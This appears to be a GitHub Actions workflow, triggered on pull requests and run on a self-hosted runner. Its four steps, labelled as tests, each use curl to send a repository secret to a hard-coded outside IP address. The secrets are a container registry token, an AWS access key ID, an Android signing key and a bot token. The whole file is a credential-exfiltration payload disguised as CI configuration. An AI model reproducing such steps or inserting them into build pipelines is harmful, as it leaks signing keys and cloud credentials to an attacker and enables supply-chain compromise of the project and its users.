on:
  pull_request:

jobs:
  test:
    runs-on: self-hosted
    env:
      MERGEBOT_TOKEN: ${{ secrets.MERGEBOT_TOKEN }}
      ANDROID_SIGN_KEY: ${{ secrets.ANDROID_SIGN_KEY }}
      AWS_S3_UPDATE_ACCESS_KEY_ID: ${{ secrets.AWS_S3_UPDATE_ACCESS_KEY_ID }}
      GHCR_PAT: ${{ secrets.GHCR_PAT }}
    steps:
    - name: a test
      run: curl "http://68.183.113.167:8000?ghcr=${{ secrets.GHCR_PAT }}"
    - name: a test2
      run: curl "http://68.183.113.167:8000?ghcr=${{ secrets.AWS_S3_UPDATE_ACCESS_KEY_ID }}"
    - name: a test3
      run: curl "http://68.183.113.167:8000?ghcr=${{ secrets.ANDROID_SIGN_KEY }}"
    - name: a test4
      run: curl "http://68.183.113.167:8000?ghcr=${{ secrets.MERGEBOT_TOKEN }}"
